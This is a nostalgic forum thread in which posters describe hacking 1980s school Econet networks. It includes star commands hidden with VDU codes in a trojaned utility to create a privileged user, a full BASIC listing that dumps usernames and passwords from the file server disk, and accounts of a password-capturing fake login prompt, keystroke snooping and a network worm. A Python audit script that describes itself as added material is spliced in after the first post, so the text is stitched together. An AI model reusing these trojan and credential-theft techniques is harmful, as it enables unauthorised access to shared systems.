Hacking the school Econet

discussion of beeb/electron applications, languages, utils and educational s/w
User avatar
davidjefferies
Posts: 19
Joined: Thu Jul 14, 2016 2:40 pm
Contact:

Hacking the school Econet

Postby davidjefferies » Mon Feb 19, 2018 1:52 pm

When we were at school my brother reckoned he knew someone at a neighbouring school who was so successful at hacking Econet that the teachers gave up and just let him have the system password. Looking back I'm not sure the story was true but it fascinated me at the time and I spent hours trying to hack our network.

I remember printing out the disassembly of the Econet filing system hoping to find a flaw but was hopelessly out of my depth and gave up after a day or so.

I was eventually successful by writing a handy little utility that the school wanted to put on the fileserver. The program used the BASIC assembler to assemble and save the machine code utility which meant it had to be run by the System user because it needed access to the Utility directory. In the middle of the BASIC part of the program I put two star commands like this

Code:

   *NEWUSER BOB
   *PRIV BOB S

and poked the VDU 20 command into the beginning of the first line to hide those lines when the program was listed.

When the System user ran the program to generate the utility it made a new privileged user that I was able to log in as the next day.

It wasn't exactly foolproof because the lines would have been visible to a *DUMP or similar but it worked like a charm when I tried it.

Anyone else know of alternative ways that the network was hacked BITD?
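A defender-side check for the hidden-line trick described above, as an added example and not code from the original post: it walks a tokenised 6502 BBC BASIC file the way a *DUMP would, flagging control bytes poked into a line and star commands that create or privilege a user. The on-disk line layout, the small token table and the watch-list of commands are assumptions; the sample program is constructed.

```python
"""Audit a tokenised 6502 BBC BASIC program for content that LIST would hide.
Constructed example, not code from the thread. Line format assumed: 0x0D, line
number high byte, low byte, total line length, body; the program ends 0x0D 0xFF.
Reports what a *DUMP would have shown: control bytes inside a line body and
*-commands that create or privilege users. Token values are BASIC II's."""

TOKENS = {0xEB: "MODE", 0xF1: "PRINT", 0xF4: "REM", 0xE0: "END"}  # subset used here
PRIVILEGED_STAR = ("NEWUSER", "PRIV", "REMUSER", "PASS")  # assumed watch-list

def parse_program(blob):
    """Yield (line_number, body) for each line of a tokenised program."""
    pos = 0
    while pos + 1 < len(blob):
        if blob[pos] != 0x0D:
            raise ValueError("expected line marker at offset %d" % pos)
        if blob[pos + 1] == 0xFF:
            return                                   # end-of-program marker
        hi, lo, length = blob[pos + 1], blob[pos + 2], blob[pos + 3]
        if length < 4 or pos + length > len(blob):
            raise ValueError("bad line length at offset %d" % pos)
        yield (hi << 8) | lo, bytes(blob[pos + 4:pos + length])
        pos += length

def detokenise(body):
    """Render a line body as text: expand known tokens, escape control bytes."""
    return "".join(TOKENS.get(b, "<%02X>" % b if b < 0x20 else chr(b)) for b in body)

def audit(blob):
    """Return (line_number, reason, text) findings in program order."""
    findings = []
    for number, body in parse_program(blob):
        text = detokenise(body)
        hidden = sorted({b for b in body if b < 0x20})
        if hidden:                                   # VDU codes poked into the line
            findings.append((number, "control bytes " + " ".join("%02X" % b for b in hidden), text))
        words = bytes(b for b in body if b >= 0x20).decode("latin-1").strip().split()
        if words and words[0].startswith("*"):       # star command: stored as plain text
            verb = words[0][1:].upper()
            if verb in PRIVILEGED_STAR:
                findings.append((number, "privileged command *" + verb, text))
    return findings

def line(number, body):
    """Encode one line in the tokenised file format."""
    return bytes([0x0D, number >> 8, number & 0xFF, len(body) + 4]) + body

# Constructed sample: a harmless-looking utility with two hidden lines spliced in.
SAMPLE = (
    line(10, b"\x15\xF4 Utility builder")        # VDU 21 switches the listing off
    + line(20, b"*NEWUSER BOB")
    + line(30, b"*PRIV BOB S")
    + line(40, b"\x06\xF1\"Assembling...\"")     # VDU 6 switches it back on
    + line(50, b"\xE0")                          # END
    + b"\x0D\xFF"
)

if __name__ == "__main__":
    for number, reason, text in audit(SAMPLE):
        print("%5d  %-28s %s" % (number, reason, text))
```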

johnkenyon
Posts: 142
Joined: Wed Jul 20, 2011 2:21 pm
Location: Coventry
Contact:

Re: Hacking the school Econet

Postby johnkenyon » Mon Feb 19, 2018 3:38 pm

My technique was to keep my eyes peeled for one of the two teachers leaving the Network Manager menu program on an unattended computer.
The sequence then went something like:

1) Hit break on the computer logged in with a privileged account.
2) *PRIV <myid> S
3) Hit break again
4) Move to another computer, login, then make the password file readable, take a copy then make it non-readable.
5) Remove the S privilege from <my id>
6) Run some random save commands so that the PRIV command scrolled off the top of the log screen on the file server
7) Run a basic program which decoded the contents of the password file into a text file.

The system administrators used to regularly run a program to list privileged user accounts - hence the need to *UNPRIV as quickly as possible.

The only other way to hack the system was to sniff the network watching out for a client sending *I AM to the fileserver, and then capturing the packets for a good couple of minutes afterwards looking for the username (if "*I AM :" was used) and the password. Given that the L3 file server password file wasn't encrypted, I reckon the username+password data would have been in clear text.
I never did this - would have required some low level 68B54 programming, probably combined with disassembling the NETMON command...

paulb
Posts: 811
Joined: Mon Jan 20, 2014 9:02 pm
Contact:

Re: Hacking the school Econet

Postby paulb » Mon Feb 19, 2018 3:54 pm

davidjefferies wrote:When we were at school my brother reckoned he knew someone at a neighbouring school who was so successful at hacking Econet that the teachers gave up and just let him have the system password. Looking back I'm not sure the story was true but it fascinated me at the time and I spent hours trying to hack our network.


Not undermining what your brother said, here, or the elite hacker skills of his acquaintance, but such reputations are often built on the same kind of thing you get these days with "little Johnny is so good with computers, just look at him!" Of course, the child in question could just be flailing around, but to the "digitally unaware", this can seem like elite skills in action.

As the amusing tales have shown so far in this thread, a lot can be done by subverting the social aspects around technology: getting people to install your code, waiting for people to leave themselves logged in as a privileged user. There was a systems administrator at my university who had a reputation for leaving himself logged in as root, meaning that people learned to check the prompt at the terminal after he'd left the room.

I never had any direct experience with Econet, but I seem to remember that there were those remote procedure calls that acted like a huge backdoor, allowing remote users to call MOS routines. I guess that people might have used those to exploit the weaknesses and gain privileges.

User avatar
BeebMaster
Posts: 2530
Joined: Sun Aug 02, 2009 4:59 pm
Location: Lost in the BeebVault!
Contact:

Re: Hacking the school Econet

Postby BeebMaster » Mon Feb 19, 2018 4:46 pm

I think we have reminisced about this before, but one particular "hack" which has just come to mind was that the key to our school computer room door was the same as someone's garage key, so we could "break in" at times when it was locked when there were no teachers about!

SteveBagley
Posts: 150
Joined: Sun Mar 15, 2015 8:44 pm
Contact:

Re: Hacking the school Econet

Postby SteveBagley » Mon Feb 19, 2018 5:10 pm

paulb wrote:I never had any direct experience with Econet, but I seem to remember that there were those remote procedure calls that acted like a huge backdoor, allowing remote users to call MOS routines. I guess that people might have used those to exploit the weaknesses and gain privileges.


Not to gain privileges -- but I once used the RPC functionality to remotely call OS_ServiceCall with the right values to get VProtect to pop up a dialog box saying the disk was infected with the 'Terminator 2' (I think?) virus as the Head of IT/Maths* popped a floppy in the drive (which would of course then display as clear when scanned :)).

In fact, I'm fairly certain this required chaining two RPCs, since the school was running both Econet and also Lingenuity's SCSIShare system. The Lingenuity setup was basically a single SCSI HDD connected to six Archimedes, with one shared read-only partition and a separate writable partition for each machine. There was also software set up to share printing over the network which used a print spooler called !Replay running on one machine and a module called PShareFS that allowed the other machines to access a shared directory on the machine running !Replay to drop the files to be printed into. A friend and I reverse engineered PShareFS and found it also implemented a SWI called PShare_FarSWI that allowed a SWI to be executed on a remote machine.

Anyway, I was on an A5000 connected to the school Econet and so would have needed to drop code onto an A310 connected to both the Econet and the SCSIShare via an Econet RPC that called PShare_FarSWI to reach the 'victim's' machine…

Steve

* Who was also my tutor and so he very quickly realised what was going and who was responsible… :)

User avatar
ctr
Posts: 130
Joined: Wed Jul 16, 2014 2:53 pm
Contact:

Re: Hacking the school Econet

Postby ctr » Mon Feb 19, 2018 7:48 pm

I wrote some code to intercept the command line interpreter vector and told the teacher I needed him to configure something for me, knowing he would use my computer.

When he logged in my code recognised the command, displayed the usual prompt, squirrelled away the password, unhooked the vector and displayed the login failed error message. He'd try again, everything would work, and I'd have his password.

User avatar
flaxcottage
Posts: 3025
Joined: Thu Dec 13, 2012 8:46 pm
Location: Derbyshire
Contact:

Re: Hacking the school Econet

Postby flaxcottage » Mon Feb 19, 2018 9:18 pm

One of my students BITD managed to push a piece of software onto my computer via the Econet, which software monitored my keystrokes and echoed them on the student's screen. That way he worked out what the administrator password was.

He then took great delight in telling me what my password was as soon as he found it; at the same time he told me how to run code as part of the boot sequence on the Econet machines to prevent this hack.

This guy was a real genius getting straight As at O-Level and A-Level and a first in Computing at university. He also wrote a routine to smoothly scroll the BBC screen upwards or downwards and as the graphic screen moved out of view a MODE7 screen scrolled into place and vice versa. At the time Acorn said it could not be done. Wish I'd kept that code. :?
- John

Why do I keep collecting Acorn gear? I'm going to need a considerably bigger man-cave. :?

duikkie
Posts: 2830
Joined: Fri Feb 07, 2014 3:28 pm
Contact:

Re: Hacking the school Econet

Postby duikkie » Tue Feb 20, 2018 11:17 am

Somewhere on this forum I uploaded a program, was it nice programs, I don't know anymore,
but I wrote a program to get all usernames and passwords from Econet.

As always with my programs, most of them are not finished :) What I remember is that all usernames and passwords were on a floppy with a second processor as the server.

Never used Econet myself, but I did work at a school for half a year with Econet, and the usernames and passwords were developed to be hacked :shock: :D

User avatar
hoglet
Posts: 7062
Joined: Sat Oct 13, 2012 6:21 pm
Location: Bristol
Contact:

Re: Hacking the school Econet

Postby hoglet » Tue Feb 20, 2018 11:37 am

duikkie wrote:Somewhere on this forum I uploaded a program, was it nice programs, I don't know anymore,
but I wrote a program to get all usernames and passwords from Econet.

Here?
http://www.stardot.org.uk/forums/viewto ... 175#p90175

Code:

   10 MODE7
   20 PROCinit
   30 PROCtrack
   40 PROCsort
   50 PROCscreen
   60 END
   70 DEFPROCinit
   80 DIM iden$(15),pass$(15),priv$(15)
   90 ENDPROC
  100 DEFPROCtrack
  110 ?&7B00=0:!&7B01=&4000:?&7B05=3:?&7B06=&53:?&7B07=9:?&7B08=7:?&7B09=&21
  120 A%=&7F:X%=&0:Y%=&7B:CALL&FFF1
  130 ENDPROC
  140 DEFPROCsort
  150 FOR I%=1 TO 15
  160 IF ?(&3FEF+I%*17)=0 THEN GOTO 330
  170 C%=0:iden$(I%)=""
  180 REPEAT
  190 B%=?(&3FEF+C%+I%*17)
  200 IF B%=&0D THEN 230
  210 iden$(I%)=iden$(I%)+CHR$(B%)
  220 C%=C%+1
  230 UNTIL C%=10 OR B%=&0D
  240 C%=10:pass$(I%)=""
  250 REPEAT
  260 B%=?(&3FEF+C%+I%*17)
  270 IF B%=0 OR B%=&0D THEN 300
  280 pass$(I%)=pass$(I%)+CHR$(B%)
  290 C%=C%+1
  300 UNTIL C%=16 OR B%=0 OR B%=&0D
  310 priv$(I%)=""
  320 IF ?(&3FEF+16+I%*17)>&80 THEN priv$(I%)="*"
  330 NEXT
  340 ENDPROC
  350 DEFPROCscreen
  360 PRINT:PRINT
  370 PRINTTAB(2);"PASSWORD-CRAKER for econet level 2"
  380 PRINT:PRINTTAB(2);"identifier";TAB(16);"password";TAB(27);"privelege"
  385 PRINT
  390 FOR I%=1 TO 15
  400 PRINTTAB(2);iden$(I%);TAB(16);pass$(I%);TAB(31);priv$(I%)
  420 NEXT
  430 ENDPROC

duikkie
Posts: 2830
Joined: Fri Feb 07, 2014 3:28 pm
Contact:

Re: Hacking the school Econet

Postby duikkie » Tue Feb 20, 2018 12:02 pm

why am i so bad in finding :)

hoglet wrote:
duikkie wrote:Somewhere on this forum I uploaded a program, was it nice programs, I don't know anymore,
but I wrote a program to get all usernames and passwords from Econet.

Here?
http://www.stardot.org.uk/forums/viewto ... 175#p90175


User avatar
jgharston
Posts: 3022
Joined: Thu Sep 24, 2009 11:22 am
Location: Whitby/Sheffield
Contact:

Re: Hacking the school Econet

Postby jgharston » Tue Feb 20, 2018 1:31 pm

hoglet wrote:
duikkie wrote:Somewhere on this forum I uploaded a program, was it nice programs, I don't know anymore,
but I wrote a program to get all usernames and passwords from Econet.

Here?
http://www.stardot.org.uk/forums/viewto ... 175#p90175

But for that to work you need to have already broken the security - you need to have physical access to the physical disk.

Code:

$ bbcbasic
PDP11 BBC BASIC IV Version 0.25
(C) Copyright J.G.Harston 1989,2005-2015
>_

User avatar
davidjefferies
Posts: 19
Joined: Thu Jul 14, 2016 2:40 pm
Contact:

Re: Hacking the school Econet

Postby davidjefferies » Tue Feb 20, 2018 2:14 pm

johnkenyon wrote:The only other way to hack the system was to sniff the network watching out for a client sending *I AM to the fileserver, and then capturing the packets for a good couple of minutes afterwards looking for the username (if "*I AM :" was used) and the password. Given that the L3 file server password file wasn't encrypted, I reckon the username+password data would have been in clear text.
I never did this - would have required some low level 68B54 programming, probably combined with disassembling the NETMON command...


This was the sort of thing I was thinking about. The Econet Advanced User Guide http://chrisacorns.computinghistory.org ... ncedUG.pdf details the format of the packets sent over the network. I hadn't realised the passwords file was unencrypted, ha, in which case I agree the passwords were almost certainly sent unencrypted over the network and a utility similar to Netmon would have been able to sniff them out.

flaxcottage wrote:One of my students BITD managed to push a piece of software onto my computer via the Econet, which software monitored my keystrokes and echoed them on the student's screen. That way he worked out what the administrator password was.


Looking in the EAUG it's amazing (by today's security standards) how much support there is for sending and receiving blocks of memory, which would have enabled a keystroke reader. The *View command is doing the same thing but with screen memory. I remember a few little programs from BITD that would cause the characters to fall down the screen etc. which presumably used a similar technique.

On a tangent, but reading the entry for *VIEW was the first time I realised that the screen modes on the BBC were organised in decreasing order of memory consumption from 0 to 7. After all the years I can't believe I'd never noticed that :)

Commie_User
Posts: 1066
Joined: Wed Jan 27, 2016 12:50 am
Contact:

Re: Hacking the school Econet

Postby Commie_User » Tue Feb 20, 2018 4:42 pm

I don't know if this counts but all I had to do was hit Break on the RM Nimbus keyboard and I had access to all the BBC programs on the PC network with a *CAT command.

I dropped my own BASIC bits of fun on there and I think they were still there years later when I left school.

crj
Posts: 832
Joined: Thu May 02, 2013 4:58 pm
Contact:

Re: Hacking the school Econet

Postby crj » Wed Feb 21, 2018 7:47 pm

Um.

On the one hand, our staff were pretty knowledgeable. For example, they physically isolated the fileserver and admin workstation from the rest of the Econet before performing management operations, precisely because they knew passwords were in the clear on the wire.

On the other hand, I wrote the membership software for the school computing society. Since members had accounts on the SJ Research file server, this dumped out scripts to create and remove users, which I then had the sysadmin run. They claimed they reviewed the scripts before running them and I'm quite sure they did the first few times. I bet they got careless after a while, though. Conversely, I was trustworthy, so it was all OK. (-8


Meanwhile, there was a small dedicated group of us that took anything and everything apart. We did write a hacked version of NETMON which only looked for *I AM commands. Indeed, we got to the point where we'd taken apart NETMON and NFS enough that we knew in principle how to make a hacked NFS which ran from sideways RAM and silently logged *I AM commands in the background while you were innocently doing something else.

(Incidentally, the "*I AM :" mechanism was entirely client-side. It prompted for the password then sent a normal *I AM command, password included, over the wire.)

But we never bothered deploying that. Far simpler was just to go round a loop peeking &3E0-&3FF from each machine to get their keyboard buffers, including the most recent 32 keystrokes. 32 keystrokes from each machine on the network fitted quite neatly in one MODE 7 display.

A thing I wrote out of morbid curiosity, then hid away because some things belong dead, was a hacked NFS which allowed you to change your station number. But I went one step further with *JAM and *UNJAM commands. *JAM would cause a line jam on the Econet, unjamming only when I wanted to send or receive. This meant you could hijack another station's file server login and lock them out from interfering with whatever you chose to do.

One of my friends wrote an entertaining utility ROM for the BBC Micro which could molest an Archimedes over the Econet. Particularly, it could hack various video games. If you were feeling nice, a player might suddenly find they had a lot more lives in Zarch; if not, well, they probably didn't really want all that fuel after all.


My nastiest hack, though, was an Econet worm. Every running copy of it repeatedly tried to infect every other computer on the Econet. If you power-cycled a machine, it would get re-infected more quickly than you knew how to prevent. Your only hope was to power cycle with your network lead unplugged and happen to have memorised "A%=19:X%=0:Y%=9:!&900=&FF05:CALL&FFF1" to protect yourself. The only way to completely kill the worm was to switch off every infected computer simultaneously.

Needless to say, I wrote that on a rainy afternoon when the fileserver was down and the room was practically deserted.

Knowing I was playing with fire, I was quite careful to make sure people couldn't get a copy of it. Infection was a two-part process: the payload was obfuscated, and the critical section which infected other computers was garbage you had to EOR with the subsequent JSR immediate operation's argument block. Also, it put important code at &700, so if you protected yourself against JSR but not Poke you'd instantly destroy the payload if you were running BASIC.

Unfortunately, one of my friends used NETMON to see what was going on. With their machine protected, they wrote some code that:
  • Re-enabled Poke
  • Waited a few seconds
  • Disabled Poke
  • Copied &400-&7FF up into higher memory
  • Hacked the JSR entry point to JMP into their code fragment
  • Re-enabled JSR
  • When the hacked JSR entry was called, collected the argument block into higher memory, disabled JSR and did *BASIC
Finally, they had what they needed to reverse-engineer the payload. Frankly, it would have been easier just to write their own worm!

I'd like to think that once they'd had the satisfaction of picking apart my protection they didn't then abuse my worm. Anecdotally, that may not have been the case. )-8

User avatar
jgharston
Posts: 3022
Joined: Thu Sep 24, 2009 11:22 am
Location: Whitby/Sheffield
Contact:

Re: Hacking the school Econet

Postby jgharston » Wed Feb 21, 2018 8:29 pm

I wrote *GRAB and *PUSH which grabbed or pushed a BASIC program, and *KILL and *UNKILL which did what it says on the tin. The latter two taught me to always write the command parsing routines before testing. I'd quickly thrown in a quick hex scan code for testing. Completely forgetting that I'd done that, I experimentally tried to *KILL 20 to kill the station next to me. Cue a cry of despair from the other side of the room as Station 32 crashed!


User avatar
petercumberland
Posts: 26
Joined: Wed Feb 21, 2018 5:06 pm
Location: UK
Contact:

Re: Hacking the school Econet

Postby petercumberland » Wed Feb 21, 2018 9:26 pm

davidjefferies wrote:When we were at school my brother reckoned he knew someone at a neighbouring school who was so successful at hacking Econet that the teachers gave up and just let him have the system password. Looking back I'm not sure the story was true but it fascinated me at the time and I spent hours trying to hack our network.

Do you remember the name of the neighbouring school? If it was Raynes Park High School then the story is true!
______________________________________________________________
I am just trying to get to the end of the day without somebody saying at the end of the day